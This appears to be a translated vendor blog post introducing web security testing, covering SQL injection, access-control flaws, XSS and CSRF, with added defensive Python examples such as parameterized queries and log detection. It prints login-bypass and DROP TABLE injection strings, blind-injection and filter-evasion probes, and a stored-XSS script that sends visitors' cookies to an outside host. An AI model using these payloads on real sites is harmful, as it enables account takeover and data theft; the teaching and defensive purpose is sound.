Cloud Wisdom Wang Xiaoyu
Security testing is the process, carried out over the life cycle of an IT software product and especially once development is essentially complete and the product is approaching release, of testing the product to verify that it complies with its security requirements definition and product quality standards. In a nutshell, security testing checks whether a product meets its security requirements.
Software testing is commonly divided into four main types: functional testing, automated testing, security testing and performance testing. Security testing is performed after functional and automated testing and before performance testing, because some of the fixes made in response to security findings may affect performance.
Security testing usually covers bypassing permission checks, modifying submitted request data, and so on; more complex products are also tested for SQL injection, cross-site scripting and similar issues. Let's look at the security threats that Internet products face.
SQL injection
Because programmers vary in skill and experience, quite a few fail to validate the legitimacy of user input when writing code, which exposes the application to risk: a user can submit database query code in an input field and analyze the returned results to extract the data they want. This is called SQL injection.
If a product or web site skips security testing, an attacker can either dump the database outright (a "bauku" attack, obtaining the whole database) or use blind SQL injection to learn the name of the database used by the current project, the account the web application connects with, the tables and their structure, the field names, and even the data stored in the database. That is why the database connection code at the bottom of our products uses anti-SQL-injection techniques.
SQL injection arrives over the normal WWW port, and on the surface it looks no different from ordinary page access, so the firewalls currently on the market do not alert on it. If the administrator is not in the habit of checking the server logs, an intrusion may go undetected for a long time.
Let's demonstrate one of the most basic vulnerabilities:
On a system's login page, enter the user name and password as shown in the screenshot and click Log in: the login succeeds. Why?
The classic SQL for a login module is built by string concatenation:
"SELECT id FROM user WHERE uname='" + username + "' AND pwd='" + password + "'"
If the user name is admin and the password is 123456, the SQL statement generated at login is:
SELECT id FROM user WHERE uname='admin' AND pwd='123456'
With the malicious input shown in the screenshot (password ' or '1'='1), the SQL becomes:
SELECT id FROM user WHERE uname='admin' AND pwd='' or '1'='1'
Or, more simply, enter the user name as admin'-- (with a trailing space), which comments out the rest of the statement.
Either way the result is a statement the SQL parser accepts and executes, and the attacker is logged in as the administrator (or as whatever uname was supplied).
MySQL uses -- for comments. If we change the SQL statement above to:
SELECT id FROM user WHERE uname='' or '1'='1'; DROP TABLE user;--' AND pwd=''
The part after uname= is our input (shown in red in the original). The SQL still parses correctly and the user table is deleted (if the database account has permission to drop tables); without that permission, DELETE FROM user removes every row of the table, which has much the same effect as dropping it.
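The login query above, built by concatenation as in the post and beside it the parameterized form, as an added example (not code from the original post). It uses an in-memory SQLite table with one constructed admin row; the two bypass inputs are the ones discussed above.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed sample schema: one admin row (plaintext password only to keep the demo short)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, uname TEXT, pwd TEXT)")
    conn.execute("INSERT INTO user VALUES (1, 'admin', '123456')")
    return conn

def login_concat(conn: sqlite3.Connection, username: str, password: str):
    """The vulnerable pattern from the post: input is spliced into the SQL text, so a
    quote in the input changes the statement's structure instead of being data."""
    sql = ("SELECT id FROM user WHERE uname='" + username
           + "' AND pwd='" + password + "'")
    return conn.execute(sql).fetchone()

def login_param(conn: sqlite3.Connection, username: str, password: str):
    """Hardened form: placeholders send the values separately from the SQL text,
    so ' or '1'='1 is compared literally against the stored password."""
    sql = "SELECT id FROM user WHERE uname=? AND pwd=?"
    return conn.execute(sql, (username, password)).fetchone()

def demo() -> dict:
    """Run the inputs from the post against both implementations."""
    conn = make_db()
    cases = {
        "legit": ("admin", "123456"),
        "or_1_eq_1": ("admin", "' or '1'='1"),   # the password shown in the screenshot
        "comment": ("admin'-- ", "wrong"),        # admin'-- comments out the pwd check
    }
    results = {}
    for name, (u, p) in cases.items():
        results[name] = {"concat": login_concat(conn, u, p) is not None,
                         "param": login_param(conn, u, p) is not None}
    return results

if __name__ == "__main__":
    for name, r in demo().items():
        print(f"{name:10s} concat={'login' if r['concat'] else 'denied'}  "
              f"param={'login' if r['param'] else 'denied'}")
```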
Of course, the injection payload depends on the type of parameter the SQL expects. Two common ways to determine whether a parameter point is injectable:
1. Append a single quote ' directly after the parameter and see whether an error occurs; if the database reports an internal error, you can conclude there is a SQL injection problem.
2. If the parameter is an integer, use and 1=1 / and 1=2 to judge: if the query with and 1=1 returns results and the one with and 1=2 returns nothing or an error, we conclude that a SQL injection vulnerability exists. The reasoning is that if the system does not treat the appended text as SQL, both requests should return the same result as the original (or, if the whole value is treated as a string, both should return nothing), as in figure 1. For string parameters, use ' and '1'='1 and ' and '1'='2 for the same judgement (figure 2); the logic is the same as for integers. For search-type parameters, inject with ' and '% (figure 3). Depending on the actual situation, you need to analyze the parameter being injected consciously in order to construct the injected statement.
Once a SQL injection vulnerability has been confirmed, a tester can report it to the developers for remediation, but as security enthusiasts we can go further. The most basic approach is to guess table and field names with simple SQL statements. A table name can be confirmed with a true/false condition such as and (select count(*) from user)>0: if the page returns empty, the user table exists; if it returns the same as the original page, it does not. A field is confirmed the same way, for example and (select count(username) from user)>0. Let's focus on confirming the value of a field, which is rather fun.
Take a character-type field as an example. If there is a username field, first you need to know the length of the field value, with the following statement:
and (select length(username) from users where id=1)=N    (try N = 1 to 10)
Next, you need to find each character of the value (a-z, A-Z, 0-9):
and substr((select username from users where id=1),1,1)='a'    (try 'a' to 'z')
Of course, you can also use the ASCII method:
and (select ascii(substr(username,1,1)) from users where id=1)=N    (try N = 0 to 128)
Consider an example:
1. Get the length first: intercept the request containing the SQL injection with the Burp Suite tool, mark the highlighted part of the screenshot as the payload position, and obtain a length of 4 for the name field value;
2. Then obtain each character of the name field value in turn: for each position, use the ASCII code (payload range 0~128) as the parameter to find the value.
When the characters themselves are used as the payload (A~Z, a~z, 0~9), set those ranges as the payload.
Sometimes the developer will consciously filter input to prevent an attacker entering characters or words such as ' or select. Below are the ways these filters are avoided:
3. Use ASCII codes to build an alternative dynamically: if the single quote is masked in the input, try the ASCII code of the character instead, CHAR(39).
4. If the select keyword is blocked, try a URL-encoded or hex-encoded form:
%00select
%53%45%4c%45%43%54
Some developers filter the keywords select, update and delete but forget about case sensitivity, so Select may get through. When you cannot guess a field name, look at the forms on the site: for convenience, field names are usually the same as the names of the form's input boxes.
Special note: in the address bar a + is interpreted by the program as a space, %2B as +, and %25 as %. When injecting with the GET method, IIS, Apache and other web servers record the whole submitted string in their logs, whereas a POST body is not recorded, so wherever POST can be used, avoid GET.
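Seen from the administrator's side, the probes listed in points 1 to 4 above leave traces in exactly the access logs the note mentions. This added example (not from the original post) reviews constructed Apache-style log lines for them; URL-decoding and lower-casing first is what makes %53%45%4c%45%43%54, Select and %00select all look like select. Because POST bodies are absent from these logs, the same rules belong in application-level request logging as well.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access-log lines: client, request line, status, bytes.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Nov/2016:14:20:48 +0800] "GET /item?id=7 HTTP/1.1" 200 512
10.0.0.9 - - [09/Nov/2016:14:21:08 +0800] "GET /item?id=7' HTTP/1.1" 500 0
10.0.0.9 - - [09/Nov/2016:14:21:36 +0800] "GET /item?id=7%20and%201=2 HTTP/1.1" 200 0
10.0.0.9 - - [09/Nov/2016:14:22:19 +0800] "GET /item?id=7%20and%20(%53%45%4c%45%43%54%20length(username)%20from%20users%20where%20id=1)=4 HTTP/1.1" 200 0
10.0.0.9 - - [09/Nov/2016:14:22:43 +0800] "GET /search?q=CHAR(39)%20or%20%271%27=%271 HTTP/1.1" 200 512
10.0.0.7 - - [09/Nov/2016:14:23:07 +0800] "GET /search?q=rock%27n%27roll HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3})')

# Rules run against the fully URL-decoded, NUL-stripped, lower-cased query string,
# so %53%45%4c%45%43%54, Select and %00select all reduce to "select".
RULES = [
    ("boolean probe", re.compile(r"\b(and|or)\s+\(?\s*'?\d+'?\s*=\s*'?\d+'?")),
    ("sql keyword", re.compile(r"\b(select|union|drop|delete|update)\b")),
    ("quote-function bypass", re.compile(r"\bchar\s*\(\s*39\s*\)")),
    ("comment terminator", re.compile(r"--")),
]

def normalize(query: str) -> str:
    """Decode twice (catches %2527-style double encoding), drop %00, lower-case."""
    decoded = unquote_plus(unquote_plus(query))
    return decoded.replace("\x00", "").lower()

def review(log_text: str) -> list:
    """One finding per suspicious request: client, target, status and the rules that fired."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        query = target.partition("?")[2]
        if not query:
            continue
        norm = normalize(query)
        reasons = [name for name, rx in RULES if rx.search(norm)]
        # A lone quote matters when the server choked on it (5xx): that is the
        # "append ' and watch for an error" test from the post, seen from the log side.
        if "'" in norm and status.startswith("5"):
            reasons.append("quote caused server error")
        if reasons:
            findings.append({"ip": ip, "method": method, "target": target,
                             "status": status, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in review(SAMPLE_LOG):
        print(f["ip"], f["status"], f["reasons"], f["target"])
```

The last sample line (rock'n'roll, status 200) is deliberately not flagged: a quote alone is normal user input, and only the combination with a server error or a SQL construct is worth an alert.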
Students who use Toushibao (Perspective Bao) do not have this concern, because the database connection code at the bottom of Toushibao already uses anti-SQL-injection techniques, so it can be used with confidence!
The harm of weak permission control
Next, permission control. Permissions are like a company's door access: only students with an access card can come and go freely; someone without a card can go out, but the security guard will only let them in if a student inside opens the door or someone else's card is used. That is the simplest form of permissions. If the guard is missing, some people will bypass the permission check and do things they should not.
A simple example: a login module lets you log in only after entering a registered user name and password, so we honestly enter our own registered user name and password (such as [email protected]/123) and log in successfully. But what if we enter a user name that does not exist?
First look at the SQL. The login module compares against the database with the following SQL:
SELECT count(*) FROM user WHERE uname="[email protected]" AND pwd="123"
Of course, the SQL in a real application is more complex than this, but what happens if the special string " or "1"="1 is appended to the password?
SELECT count(*) FROM user WHERE uname="[email protected]" AND pwd="" or "1"="1"
We have successfully bypassed the login authorization check... So much for "only registered users can log in"?! ...... I feel like I no longer believe in love.
Access control can be broadly divided into three categories: vertical access control, horizontal access control, and context-dependent access control. To show that an e-commerce system has no permission problems, you need to verify the following points:
First, whether unauthenticated access is possible: some requests require a login, yet accessing them directly without logging in succeeds anyway;
Second, whether there is a vertical privilege escalation problem: for example, an ordinary user can access a request meant only for administrator users, which shows there is an escalation vulnerability;
Third, if user A and user B are both ordinary users, their requests look alike but the returned content differs; check whether B can see content that only A is permitted to see;
Fourth, some functions require several steps to complete, such as password recovery: first enter the account, then answer various security questions, and finally obtain the password. If any step lacks proper control, the application may ignore the result of the earlier verification and perform the current step directly;
Fifth, access control based on the Referer header: attempt a privileged operation while submitting the request with the Referer header removed or modified. If that change causes the application to block the request, the application is probably relying on the Referer header in an unsafe way. Follow up by attempting the same operation with a user account that is not authorized for it, but with the original Referer header; if the system performs the operation, administrator privileges may be obtained.
Next, modifying submitted data. Suppose we buy a "kidney 8" (an iPhone) on a certain shopping site for 10000 RMB; at payment time we intercept the payment request with a tool, change the amount to 1 RMB, submit it, and find that the payment unexpectedly succeeds. Omg! Children who like Apple no longer need to worry about their kidneys, haha. This happens because the code validates only on the front end and the back end does not verify a second time. In Toushibao almost all validation is done on the back end, so there is no need to worry about client-side bypass vulnerabilities.
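The five checks above and the amount-tampering case, written as the back-end decision logic a tester would expect to find behind each request. This is an added example, not the code of any product mentioned here; users, orders, prices and session ids are constructed, and the Referer header is deliberately never consulted.

```python
class User:
    def __init__(self, name, role):
        self.name, self.role, self.reset_stage = name, role, 0  # stage: recovery progress

# Constructed data: two ordinary users, one admin, one order each, one session each.
USERS = {"alice": User("alice", "user"), "bob": User("bob", "user"),
         "root": User("root", "admin")}
ORDERS = {101: {"owner": "alice", "price": 10000}, 102: {"owner": "bob", "price": 5000}}
SESSIONS = {"s-alice": "alice", "s-bob": "bob", "s-root": "root"}  # cookie sid -> user

class Denied(Exception): pass

def current_user(headers: dict) -> User:
    """Check 1: a protected request needs a valid session cookie. Referer is never read."""
    sid = headers.get("Cookie", "").removeprefix("sid=")
    if sid not in SESSIONS:
        raise Denied("login required")
    return USERS[SESSIONS[sid]]

def admin_panel(headers: dict) -> str:
    """Check 2 (vertical): the role comes from the server-side user record, not the request."""
    if current_user(headers).role != "admin":
        raise Denied("admin only")
    return "admin panel"

def view_order(headers: dict, order_id: int) -> dict:
    """Check 3 (horizontal): the order must belong to the caller; admins may see all."""
    user = current_user(headers)
    order = ORDERS[order_id]
    if order["owner"] != user.name and user.role != "admin":
        raise Denied("not your order")
    return order

def reset_step(name: str, step: int) -> str:
    """Check 4 (multi-stage): step N is accepted only once step N-1 has succeeded."""
    user = USERS[name]
    if step != user.reset_stage + 1:
        raise Denied(f"step {step} attempted at stage {user.reset_stage}")
    user.reset_stage = step
    return "password issued" if step == 3 else f"step {step} ok"

def pay(headers: dict, order_id: int, client_amount: int) -> dict:
    """Tampered amounts: charge the server-side price and only record the mismatch."""
    order = view_order(headers, order_id)
    return {"charged": order["price"], "tampered": client_amount != order["price"]}

def denied(fn, *args) -> bool:
    """True when the call is refused (used by the demo and test)."""
    try:
        fn(*args)
    except Denied:
        return True
    return False
```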
Security implications of cross-site scripting
Finally, a brief look at the security implications of cross-site scripting. Cross-site scripting (XSS) is a computer security vulnerability that frequently appears in web applications and lets malicious web users embed code into pages served to other users; the malicious script runs when a user views the page. The attack is launched by injecting HTML, JavaScript or other script, and a successful attack can gain access to private web content, cookies and so on. In recent years XSS has become the most common web attack method.
XSS is divided into three major categories:
1. Reflected XSS: not stored in the database; the payload passes straight through (for example via a 302 redirect) and the malicious script is shown on the page only for that request. Test with <script>alert('XSS');</script> or <script>alert(document.cookie);</script>;
2. Stored XSS: saved in the database, later read from the database and displayed on the page;
3. DOM-based XSS: not saved in the database and not involving a request to the back end; it exists only in the DOM or JavaScript.
The harm of XSS includes stealing all kinds of user accounts (machine login accounts, online banking accounts, various administrator accounts), controlling data (the ability to read, tamper with, add and delete sensitive enterprise data), stealing commercially valuable information, making illegal transfers, forcing a web site to serve malware ("hanging a horse"), and controlling the victim's machine to attack other web sites...
As an example of a stored XSS vulnerability, someone on a dating site writes a script into their personal profile, such as:
<script>window.open("http://www.mysite.com?yourcookie=" + document.cookie)</script>
If the site does not encode the content correctly, then when other users of the site view this user's profile page, their current cookie is submitted to that user's web site.
You can search the Internet for more about XSS vulnerabilities; I won't describe it in detail~
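The dating-site scenario above, rendered two ways, as an added example (not from the original post): the stored profile text is constructed and contains the cookie-stealing script quoted above plus a javascript: URL for the attribute context. Output encoding at render time and an HttpOnly session cookie are the two defences shown.

```python
import html
from urllib.parse import urlsplit

# Constructed stored profile: the nickname carries the cookie-stealing script quoted above,
# and the homepage field carries a javascript: URL (the attribute-context variant).
STORED_PROFILE = {
    "nickname": 'Bob<script>window.open("http://www.mysite.com?yourcookie=" + document.cookie)</script>',
    "homepage": "javascript:alert(document.cookie)",
}

def render_vulnerable(profile: dict) -> str:
    """Stored XSS: database content is concatenated straight into the page."""
    return ('<h1>' + profile["nickname"] + '</h1>'
            '<a href="' + profile["homepage"] + '">homepage</a>')

def safe_url(url: str) -> str:
    """An href needs more than escaping: only http(s) targets are allowed through."""
    return url if urlsplit(url).scheme in ("http", "https") else "#"

def render_safe(profile: dict) -> str:
    """Encode at output time: html.escape(quote=True) neutralises < > & " ' in both contexts."""
    nick = html.escape(profile["nickname"], quote=True)
    home = html.escape(safe_url(profile["homepage"]), quote=True)
    return '<h1>' + nick + '</h1><a href="' + home + '">homepage</a>'

def session_cookie(value: str) -> str:
    """HttpOnly keeps document.cookie from seeing the session even if a script does run."""
    return f"sid={value}; Path=/; Secure; HttpOnly; SameSite=Lax"

def contains_live_script(page: str) -> bool:
    """Crude check for the demo: an unescaped <script> tag or a javascript: href."""
    low = page.lower()
    return "<script" in low or 'href="javascript:' in low

if __name__ == "__main__":
    print("vulnerable:", contains_live_script(render_vulnerable(STORED_PROFILE)))
    print("safe:      ", contains_live_script(render_safe(STORED_PROFILE)))
    print(render_safe(STORED_PROFILE))
```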
CSRF Cross-site request forgery
Having talked about XSS, let's briefly cover CSRF too. CSRF (Cross-Site Request Forgery), also known as "one-click attack" or session riding and usually abbreviated CSRF or XSRF, is a malicious exploitation of a web site. Although it sounds like cross-site scripting (XSS), it is very different from XSS, and its attack method is almost the opposite.
XSS exploits the trusted user within the site, whereas CSRF exploits the trusted site by disguising requests as coming from a trusted user. Using social engineering (such as sending a link by email), the attacker tricks the victim into performing sensitive actions such as changing a password, changing an e-mail address or transferring money, and the victim does not even realize they have been hit.
CSRF's destructive power depends on the victim's privileges: if the victim is an ordinary user, a successful CSRF attack can compromise that user's personal data and functions; if the victim has administrator rights, a successful CSRF attack can even threaten the security of the entire site. Compared with XSS, CSRF attacks are less common (and so information about them is scarce) and are hard to guard against, so CSRF is considered more dangerous than XSS and has earned a big name in the industry: the sleeping giant.
A typical example of CSRF:
Alice logs in to the financial web site mybank.com to pay online. Bob knows about the site and has realized that its transfer function has a CSRF hole, so Bob posts an entry on myblog.com, which supports custom IMG tags, and inserts this line of HTML code:
Alice opens another tab in her browser and happens to read that page, and Alice's account unknowingly transfers $3000 to Bob's account without her knowledge.
This share ends here as a first introduction; I will have the chance to present the detailed process another time. Thank you~
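The mybank.com transfer endpoint from the scenario above, protected with a per-session synchronizer token, as an added example (not from the original post). Requests are constructed dicts: the forged GET is what an IMG tag on Bob's blog would produce, the forged POST is a cross-site auto-submitting form, and the legitimate one is Alice's own form post carrying the token her page was rendered with.

```python
import hmac
import secrets

class Bank:
    """Constructed stand-in for mybank.com: one logged-in user, balances, CSRF tokens."""
    def __init__(self):
        self.balances = {"alice": 5000, "bob": 0}
        self.sessions = {"sid-alice": "alice"}   # session cookie value -> user
        self.tokens = {}                         # session cookie value -> CSRF token

    def issue_form(self, sid: str) -> str:
        """Called when the transfer form is rendered: mint a token bound to the session.
        The token lives in the page body, which another origin cannot read."""
        token = secrets.token_hex(16)
        self.tokens[sid] = token
        return token

    def transfer(self, request: dict) -> str:
        """State-changing endpoint: needs a session, POST, and a matching token."""
        sid = request.get("cookie_sid")          # the browser attaches this automatically
        if sid not in self.sessions:
            return "rejected: not logged in"
        if request.get("method") != "POST":
            return "rejected: GET must not change state"   # an IMG tag can only GET
        form = request.get("form", {})
        expected = self.tokens.get(sid, "").encode()
        supplied = str(form.get("csrf_token", "")).encode()
        if not expected or not hmac.compare_digest(expected, supplied):
            return "rejected: missing or wrong csrf token"
        src = self.sessions[sid]
        amount = int(form["amount"])
        if amount <= 0 or self.balances[src] < amount:
            return "rejected: insufficient funds"
        self.balances[src] -= amount
        self.balances[form["to"]] = self.balances.get(form["to"], 0) + amount
        return "ok"

def demo() -> dict:
    """Alice holds a session; Bob's blog page triggers the two forged requests."""
    bank = Bank()
    token = bank.issue_form("sid-alice")
    # 1. What <img src="http://mybank.com/transfer?to=bob&amount=3000"> produces.
    forged_get = {"method": "GET", "cookie_sid": "sid-alice", "query": {"to": "bob", "amount": 3000}}
    # 2. A cross-site auto-submitting form: right method, cookie attached, no token.
    forged_post = {"method": "POST", "cookie_sid": "sid-alice", "form": {"to": "bob", "amount": 3000}}
    # 3. Alice's own submission, carrying the token the page was rendered with.
    legit = {"method": "POST", "cookie_sid": "sid-alice",
             "form": {"to": "bob", "amount": 3000, "csrf_token": token}}
    return {"forged_get": bank.transfer(forged_get), "forged_post": bank.transfer(forged_post),
            "legit": bank.transfer(legit), "balances": bank.balances}

if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "->", v)
```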
Cloud Intelligence is a business operations and maintenance solution provider. Its products Jiankongbao (www.jiankongbao.com), Toushibao (www.toushibao.com) and Yacebao (www.yacebao.com) have provided one-stop application performance monitoring, management and testing services to hundreds of thousands of users in e-commerce, mobile Internet, advertising media, online games, education, medical, financial securities, enterprise and other industries.
Security testing: a maiden voyage